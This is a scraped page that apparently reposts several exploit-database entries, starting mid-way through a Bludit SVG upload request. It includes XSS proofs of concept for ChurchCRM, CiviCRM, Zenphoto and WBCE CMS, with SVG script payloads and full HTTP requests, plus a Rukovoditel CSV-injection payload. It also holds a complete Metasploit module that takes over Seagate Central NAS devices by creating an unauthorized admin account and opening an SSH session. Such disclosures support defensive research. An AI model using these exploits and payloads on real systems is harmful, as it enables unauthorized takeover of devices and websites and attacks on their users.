multipart/form-data; boundary=---------------------------15560729415644048492005010998 Referer: http://127.0.0.1/bludit/admin/settings Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i Content-Length: 651 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="tokenCSRF" 626c201693546f472cdfc11bed0938aab8c6e480 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="inputFile"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------15560729415644048492005010998-- 4. Now open the logo image link that you upload. You will see XSS pop up.
HireHackking

ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)

HACKER · %s · %s

# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) # Date: 2023-04-17 # Exploit Author: Rahad Chowdhury # Vendor Homepage: http://churchcrm.io/ # Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4 # Version: 4.5.4 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31699 Steps to Reproduce: 1. At first login your admin panel. 2. Then click the "Admin" menu and click "CSV Import '' and you will get the CSV file uploader option. 3. now insert xss payload in jpg file using exiftool or from image properties and then upload the jpg file. 4. you will see XSS pop up.
HireHackking

CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)

HACKER · %s · %s

# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) # Date: 2023-02-02 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://civicrm.org # Software Link: https://civicrm.org/download # Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier) # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70) # CVE: CVE-2023-25440 Vendor Security Advisory: CIVI-SA-2023-05 Description: A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name field, it will be triggered once page gets loaded. Steps to reproduce: - Quick Add contact to CiviCRM, - Insert a payload PoC inside the field(s) - Click on 'Add contact'. If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.
HireHackking

Zenphoto 1.6 - Multiple stored XSS

HACKER · %s · %s

Exploit Title: Zenphoto 1.6 - Multiple stored XSS Application: Zenphoto-1.6 xss poc Version: 1.6 Bugs: XSS Technology: PHP Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/ Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip Date of found: 01-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/ ===================================================== ###XSS-2### steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users) 2.change postal code as <script>alert(4)</script> 3.if admin user information import as html , xss will trigger poc video : https://youtu.be/JKdC980ZbLY
HireHackking
## # Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit) # Date: Dec 9 2019 # Exploit Author: Ege Balci # Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/ # Version: 2015.0916 # CVE : 2020-6627 # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/http' require 'net/ssh' require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Seagate Central External NAS Arbitrary User Creation", 'Description' => %q{ This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <egebalci@pm.me>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'], ['CVE', '2020-6627'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['unix'], 'Arch' => [ARCH_CMD], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Targets' => [ ['Auto', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ], ], 'Privileged' => true, 'DisclosureDate' => "Dec 9 2019", 'DefaultTarget' => 0 )) register_options( [ OptString.new('USER', [ true, 'Seagate Central SSH user', '']), OptString.new('PASS', [ true, 'Seagate Central SSH user password', '']) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916') Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit # First get current state first_state=get_state() if first_state print_status("Current device state: #{first_state['state']}") else return end if first_state['state'] != 'start' # Set new start state first_state['state'] = 'start' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "info=#{first_state.to_json}" },60) changed_state=get_state() if changed_state && changed_state['state'] == 'start' print_good("State successfully changed !") else print_error("Could not change device state") return end end name = Rex::Text.rand_name_male user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}" pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8) print_status('Creating new admin user...') print_status("User: #{user}") print_status("Pass: #{pass}") # Add new admin user res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"), 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1} },60) conn = do_login(user,pass) if conn print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})") handler(conn.lsock) end end def do_login(user, pass) factory = ssh_socket_factory opts = { :auth_methods => ['password', 'keyboard-interactive'], :port => 22, :use_agent => false, :config => false, :password => pass, :proxy => factory, :non_interactive => true, :verify_host_key => :never } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError fail_with Failure::Unreachable, 'Connection failed' rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end return nil end def get_state res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && (res.code == 200 ||res.code == 100) return res.get_json_document end res = nil end end
HireHackking

WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS) Version: 1.6.1 Bugs: XSS Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1 Host: localhost Content-Length: 976 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167 Connection: close ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="reqid" 187de34ea92ac ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="target" l1_Lw ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="mtime[]" 1683056102 ------WebKitFormBoundary5u4r3pOGl4EnuBtO-- 3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg) ======================================================================================================================== ###XSS-2### 1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages) 2. add page 3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E) payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E poc request: POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1 Host: localhost Content-Length: 143 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475 Connection: close page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save 4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php
HireHackking

Rukovoditel 3.3.1 - CSV injection

HACKER · %s · %s

Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account ) step 3. Set Firstname as =calc|a!z| step 3. If admin Export costumers as CSV file ,in The computer of admin occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1) payload: =calc|a!z|